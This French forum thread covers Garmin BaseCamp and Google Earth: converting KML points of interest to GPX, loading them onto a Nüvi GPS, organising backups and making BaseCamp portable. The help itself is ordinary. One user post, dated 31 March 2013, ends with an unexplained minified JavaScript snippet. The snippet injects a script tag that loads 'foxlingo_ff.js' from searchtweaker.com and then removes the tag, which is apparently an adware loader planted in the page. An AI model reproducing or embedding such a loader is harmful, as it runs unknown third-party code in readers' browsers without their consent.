PortailAccueilS'enregistrerCarte des membresDernières imagesConnexion
Long à charger les 1er fois - Appuyez sur le bouton "on"
Lecteur chant de Noël
polices-de-noel
-28%
Le deal à ne pas rater :
Précommande : Smartphone Google Pixel 8a 5G Double Sim 128Go ...
389 € 539 €
Voir le deal

Partagez | 
 
 
 BASECAMP et Google Earth
Voir le sujet précédent Voir le sujet suivant Aller en bas 
Aller à la page : Précédent  1, 2
AuteurMessage
Mac Cany
Globe-Surfeur "Or" (niv 6)
Globe-Surfeur
Mac Cany

Masculin Nombre de messages 7341

BASECAMP et Google Earth - Page 2 Empty
MessageSujet: Re: BASECAMP et Google Earth   BASECAMP et Google Earth - Page 2 EmptyMer 22 Aoû 2012 - 8:58

Je suis resté avec un entrée de gamme l'Etrex 10 car le H n'existe plus et cela me suffit mais ce petit GPS est vendu avec cette carte non modifiable , pas remplaçable , pas annulable et tellement succincte et apparemment fausse que cela en est ridicule , il n'y a qu'a voir la différence entre les 2 images postées plus haut car je n'ai fait que basculer d'une carte à l'autre .

Mes waypoints , traces et routes que j'avais sauvegardées semblent bien en place et même d'après la doc devraient être plus juste mais c'est la carte qui ne l'est pas , dessinée et posée grossièrement .


Autre chose , j'ai du mal à me servir de la règle de Basecamp et j'ai mis du temps à m’apercevoir que la distance et la direction sont donnée en bas à gauche de l'écran , pas pratique à mon gout .
Revenir en haut Aller en bas
Pierre
Globe-Surfeur "Or" (niv 3)
Globe-Surfeur
Pierre

Masculin Nombre de messages 3210
Localisation vosges

BASECAMP et Google Earth - Page 2 Empty
MessageSujet: Re: BASECAMP et Google Earth   BASECAMP et Google Earth - Page 2 EmptyMer 22 Aoû 2012 - 14:26

Mac Cany a écrit:
.......
Autre chose , j'ai du mal à me servir de la règle de Basecamp et j'ai mis du temps à m’apercevoir que la distance et la direction sont donnée en bas à gauche de l'écran , pas pratique à mon gout .

Basecamp n'est pas à mon sens le meilleur des services pour Garmin

J'utilise peu Basecamp, je lui préfère le service Mapsource

Le seul avantage de Basecamp me semble être la possibilité de dévérouiller directement l'affichage de certaines cartes.
Revenir en haut Aller en bas
dlv41001
Nouveau
Nouveau
dlv41001

Masculin Cancer Nombre de messages 3
Age 57
Localisation Blois, France

BASECAMP et Google Earth - Page 2 Empty
MessageSujet: Re: BASECAMP et Google Earth   BASECAMP et Google Earth - Page 2 EmptySam 30 Mar 2013 - 13:16

Bonjour,

première utilisation du forum donc excusez-moi par avance si je ne fais pas les choses dans l'ordre. Cela concerne le logiciel BaseCamp et Google Earth.
Existe-t-il une méthode pour récupérer tous les points d’intérêt que j'ai sous GE. Bien sur, comme je suis ordonné, l'architecture est assez conséquente. Est-il possible de les transférer dans mon GPS Nüvi 2595 ou sous BaseCamp. Si oui, sous quelle forme ?
Revenir en haut Aller en bas
Mac Cany
Globe-Surfeur "Or" (niv 6)
Globe-Surfeur
Mac Cany

Masculin Nombre de messages 7341

BASECAMP et Google Earth - Page 2 Empty
MessageSujet: Re: BASECAMP et Google Earth   BASECAMP et Google Earth - Page 2 EmptySam 30 Mar 2013 - 17:59

Salut

Si le dossier ou sont tes points d’intérêts est volumineux je te conseille de le scinder en 2 ou 3 parties ( par ordre d’intérêt ) pour une histoire de place mémoire de ton GPS , puis de le ou les sauvegarder dans un dossier .
Télécharger ITN converter ( gratuit ) puis avec celui-ci aller chercher le ou un des fichiers KLM que tu as sauvegardé précédemment et de le convertir au format de ton GPS , il me semble qu'il y a une option pour Garmin Nüvi mais il a des chances que ce soit au format GPX .
Ensuite tu peux envoyer ( exporter ) les données au GPS , toujours avec ITN converter , et aussi sauvegarder ces données aux format GPX pour les lire avec BaseCamp .
ATTENTION tes repères dans GE vont devenir des waypoints pour ton GPS , regardes combien de lettres/chiffres tu peux mettre pour nommer un waypoint dans ton GPS , les noms de tes repères dans GE ne devra pas dépasser ce nombre sous risque de plantage .
Revenir en haut Aller en bas
Pierre
Globe-Surfeur "Or" (niv 3)
Globe-Surfeur
Pierre

Masculin Nombre de messages 3210
Localisation vosges

BASECAMP et Google Earth - Page 2 Empty
MessageSujet: Re: BASECAMP et Google Earth   BASECAMP et Google Earth - Page 2 EmptySam 30 Mar 2013 - 22:36

dlv41001 a écrit:
Bonjour,

première utilisation du forum donc excusez-moi par avance si je ne fais pas les choses dans l'ordre. Cela concerne le logiciel BaseCamp et Google Earth.
Existe-t-il une méthode pour récupérer tous les points d’intérêt que j'ai sous GE. Bien sur, comme je suis ordonné, l'architecture est assez conséquente. Est-il possible de les transférer dans mon GPS Nüvi 2595 ou sous BaseCamp. Si oui, sous quelle forme ?

Bonsoir dlv41001

Si tu recherches simplement le transfert vers un GPS Nüvi, il n'y a aucune obligation à passer par BaseCamp

Faire une sauvegarde de tes POI's sous le format GPX dans un dossier indépendant puis effectuer ensuite le transfert avec l'outil gratuit PoiLoader

Le téléchargement des POI's peut se faire directement sur ton GPS ou sur une carte SD

Autre avantage : cet outil permet aussi la création des alertes sonores.........

Ce truc fonctionne parfaitement
Revenir en haut Aller en bas
dlv41001
Nouveau
Nouveau
dlv41001

Masculin Cancer Nombre de messages 3
Age 57
Localisation Blois, France

BASECAMP et Google Earth - Page 2 Empty
MessageSujet: Format GPX ?   BASECAMP et Google Earth - Page 2 EmptyDim 31 Mar 2013 - 12:42

:Bonjour Pierre,

merci beaucoup pour ces infos par contre, lorsque je clique sur mon dossier BaseCamp dans GE, celui-ci ne me propose qu'une sauvegarde au format kmz ou kml. Comment fait-on pour avoir le format gpx ? est-ce un module complémentaire à télécharger ou des options à déverrouiller ?
Est-ce que dans GE, tous mes WP doivent-ils être sous la racine ou bien le système accepte-t-il les répertoires et sous répertoires ?

En ce qui concerne POILoader, je l'ai déjà donc de ce coté là pas de pb.

Dominique



Pierre a écrit:
dlv41001 a écrit:
Bonjour,

première utilisation du forum donc excusez-moi par avance si je ne fais pas les choses dans l'ordre. Cela concerne le logiciel BaseCamp et Google Earth.
Existe-t-il une méthode pour récupérer tous les points d’intérêt que j'ai sous GE. Bien sur, comme je suis ordonné, l'architecture est assez conséquente. Est-il possible de les transférer dans mon GPS Nüvi 2595 ou sous BaseCamp. Si oui, sous quelle forme ?

Bonsoir dlv41001

Si tu recherches simplement le transfert vers un GPS Nüvi, il n'y a aucune obligation à passer par BaseCamp

Faire une sauvegarde de tes POI's sous le format GPX dans un dossier indépendant puis effectuer ensuite le transfert avec l'outil gratuit PoiLoader

Le téléchargement des POI's peut se faire directement sur ton GPS ou sur une carte SD

Autre avantage : cet outil permet aussi la création des alertes sonores.........

Ce truc fonctionne parfaitement
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Revenir en haut Aller en bas
Pierre
Globe-Surfeur "Or" (niv 3)
Globe-Surfeur
Pierre

Masculin Nombre de messages 3210
Localisation vosges

BASECAMP et Google Earth - Page 2 Empty
MessageSujet: Re: BASECAMP et Google Earth   BASECAMP et Google Earth - Page 2 EmptyLun 1 Avr 2013 - 12:05

dlv41001 a écrit:
..............lorsque je clique sur mon dossier BaseCamp dans GE, celui-ci ne me propose qu'une sauvegarde au format kmz ou kml. Comment fait-on pour avoir le format gpx ? est-ce un module complémentaire à télécharger ou des options à déverrouiller ?
............

Bonjour dlv41001

Si je comprends bien ce que tu cherches à faire : tu souhaiterais convertir en format GPX des POI's qui proviennent de BaseCamp lorqu'ils sont affichés sur GE

GE ne te proposera bien sûr la sauvegarde que sur des formats KMZ ou KML

C'est à partir d'un KML qu'il faut effectuer une conversion (externe à GE) vers le GPX

Diverses méthodes sont possibles.....

L'outil ITN converter

Exemple d'utilisation

Voici l'ouverture sur ITV Converter d'un KML provenant de GE avec 176 waypoints sur les mines en Alaska

BASECAMP et Google Earth - Page 2 Captur57

Puis la manip "export file format" pour sa conversion vers le GPX

Attention : Le classement des formats proposés n'est pas alphabétique ......

BASECAMP et Google Earth - Page 2 Captur58

Tu peux aussi utiliser pour ce type de conversion " KML to GPX" d'autres outils comme par exemple : POI EDITOR
Revenir en haut Aller en bas
dlv41001
Nouveau
Nouveau
dlv41001

Masculin Cancer Nombre de messages 3
Age 57
Localisation Blois, France

BASECAMP et Google Earth - Page 2 Empty
MessageSujet: Re: BASECAMP et Google Earth   BASECAMP et Google Earth - Page 2 EmptyMar 2 Avr 2013 - 18:01

Merci Pierre,
Vous êtes une 'mine d'Alaska' de renseignements.
A force d'essayer, j'avais réussi à transférer sous BaseCamp tous les points d’intérêts que j'ai sous GE. Pas de chance, tous les répertoires ont disparus au profit d'un fichier .kmz et c'est le foutoir...
J'ai donc recréé mes répertoires dans BaseCamp et ensuite, j'ai remis au bon endroit les différents POI. Bresf, un vrai bouleau au fond de la mine (d'Alaska).
J'ai ensuite exporté les dossiers (via BaseCamp) vers mon GPS et là, bingo. A nouveau le foutoir. Tout cela pour rien. Le GPS n'a récupéré que les listes créées et pas les dossiers dans lesquelles se trouvaient ces listes. Avez-vous une idée lumineuse ?
Rien n'est simple dans la vie. Heureusement que GE lui, l'est.
Je vais essayer votre méthode mais j'ai des doutes sur le résultat en terme d'architecture des répertoires.

Merci encore Pierre

Dominique

Devise : Pourquoi faire simple quand on peut faire compliqué...
Revenir en haut Aller en bas
Pierre
Globe-Surfeur "Or" (niv 3)
Globe-Surfeur
Pierre

Masculin Nombre de messages 3210
Localisation vosges

BASECAMP et Google Earth - Page 2 Empty
MessageSujet: Re: BASECAMP et Google Earth   BASECAMP et Google Earth - Page 2 EmptyMar 2 Avr 2013 - 19:38

dlv41001 a écrit:
...........
A force d'essayer, j'avais réussi à transférer sous BaseCamp tous les points d’intérêts que j'ai sous GE. Pas de chance, tous les répertoires ont disparus au profit d'un fichier .kmz et c'est le foutoir...
J'ai donc recréé mes répertoires dans BaseCamp et ensuite, j'ai remis au bon endroit les différents POI. Bresf, un vrai bouleau au fond de la mine (d'Alaska).
J'ai ensuite exporté les dossiers (via BaseCamp) vers mon GPS et là, bingo. A nouveau le foutoir. Tout cela pour rien....

Bonsoir Dominique

Une petite observation basée sur l'expérience : La sauvegarde des POI's, traces et autres Waypoints pour éviter beaucoup de problèmes devrait systematiquement se faire dans des fichiers indépendants des logiciels d'affichage cartographiques

Je conserve pour ma part par exemple, plusieurs milliers de KMZ et KML dans des dossiers totalement en dehors de GE et je ne les affiche avec le logiciel que selon les besoins.

Les GPX destinés à mon GPS, à MapSource ou à BaseCamp sont encore séparés dans d'autres dossiers

C'est vrai que ce classement est fastidieux mais c'est tellement plus sûr en cas de pépin........

De plus tout l'ensemble est placé dans un disque dur externe, une sécurité de plus pour ne pas perdre des centaines d'heures de recherche..... Very Happy
Revenir en haut Aller en bas
l'ombre
Surfeur (niv 4)
Surfeur (niv 4)
l'ombre

Masculin Gémeaux Nombre de messages 442
Age 70
Localisation Paris
Humeur Joyeux
Emploi/Loisirs Techniques,Musiques,Nature,

BASECAMP et Google Earth - Page 2 Empty
MessageSujet: Re: BASECAMP et Google Earth   BASECAMP et Google Earth - Page 2 EmptyMer 3 Avr 2013 - 12:55

je ne me prend jamais la tète avec des kml ,kmz ou gpx bien trop long volumineux et pour le classement je met mes fichiers en (.txt ) Laughing Laughing
surtout je modifie les fichiers en lecture seule Very Happy et voilou BASECAMP et Google Earth - Page 2 443989

BJ et cerise sur le gateaux plus de place avec un Zip ou Rar scratch
Revenir en haut Aller en bas
Pierre
Globe-Surfeur "Or" (niv 3)
Globe-Surfeur
Pierre

Masculin Nombre de messages 3210
Localisation vosges

BASECAMP et Google Earth - Page 2 Empty
MessageSujet: Créer votre version PORTABLE du logiciel BaseCamp   BASECAMP et Google Earth - Page 2 EmptyLun 10 Fév 2014 - 16:32

Bonjour à tous

Voici une petite combine qui peut être utile à certains d'entre vous 

Si vous avez déjà installé une première fois BaseCamp sur un ordinateur 

Il vous est alors très facile de créer à partir de cette installation une version portable de ce logiciel 

Version portable que vous pourrez ensuite transporter sans aucune autre installation (ni limitation) vers d'autres ordinateurs 

Ceci peut être particulièrement intéressant si vous rencontrez des difficultés pour accéder à BaseCamp sur certaines machines

Pour obtenir cette version portable : Il suffit simplement de copier le répertoire de BaseCamp sur une clé USB

Pour enregistrer des cartes (Format GMAP) il faut y ajouter un sous répertoire nommé "Maps"

Le répertoire de BaseCamp c'est ceci

BASECAMP et Google Earth - Page 2 Captu101

Le lancement se fait alors sans problème par l'icone Application

Ce truc fonctionne de la même façon pour l'autre logiciel cartographique de Garmin : MapSource
Revenir en haut Aller en bas
Mac Cany
Globe-Surfeur "Or" (niv 6)
Globe-Surfeur
Mac Cany

Masculin Nombre de messages 7341

BASECAMP et Google Earth - Page 2 Empty
MessageSujet: Re: BASECAMP et Google Earth   BASECAMP et Google Earth - Page 2 EmptyLun 10 Fév 2014 - 18:54

Salut

Très intéressant comme manip , j'ai installé mapsource sur mon PC de bureau et sur mon portable et dsi un jour un des 2 disques durs me lâche je pourrais donc " récupérer " Mapsource  pour le réinstaller , merci Pierre !
Revenir en haut Aller en bas
Pierre
Globe-Surfeur "Or" (niv 3)
Globe-Surfeur
Pierre

Masculin Nombre de messages 3210
Localisation vosges

BASECAMP et Google Earth - Page 2 Empty
MessageSujet: Re: BASECAMP et Google Earth   BASECAMP et Google Earth - Page 2 EmptyLun 10 Fév 2014 - 19:17

Mac Cany a écrit:
Salut

Très intéressant comme manip , j'ai installé mapsource sur mon PC de bureau et sur mon portable et dsi un jour un des 2 disques durs me lâche je pourrais donc " récupérer " Mapsource  pour le réinstaller , merci Pierre !
Bonsoir Mac Cany

Il faut savoir que Garmin privilégie maintenant BaseCamp par rapport à MapSource

Le logiciel MapSource sera donc dans l'avenir complètement obsolète

De ce faît, j'ai observé aussi qu'il était maintenant possible d'afficher dans BaseCamp certaines cartes qui ne passaient pas sur MapSource

Comme BaseCamp devient de plus en plus utile, j'ai donc pensé qu'il était temps de prendre certaines précautions via des versions portables........ Very Happy
Revenir en haut Aller en bas
Contenu sponsorisé




BASECAMP et Google Earth - Page 2 Empty
MessageSujet: Re: BASECAMP et Google Earth   BASECAMP et Google Earth - Page 2 Empty

Revenir en haut Aller en bas
 
BASECAMP et Google Earth
Voir le sujet précédent Voir le sujet suivant Revenir en haut 
 
 
 
Sujets similaires
-
» Où télécharger l'exécutable COMPLET de Google Earth (pour Windows) ? (filehippo.com) ?
» [résolu] Google ne répond plus ?
» sauvegarde mémoire cache [Problèmes Google Earth résolu]
» Google Earth et photographie.
» Lien entre Google earth et Google [Problème Google Earth résolu]
Page 2 sur 2Aller à la page : Précédent  1, 2

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Tout sur Google Earth & Maps :: Google Earth :: Cartothèque de TSGE-
 
 
Sauter vers: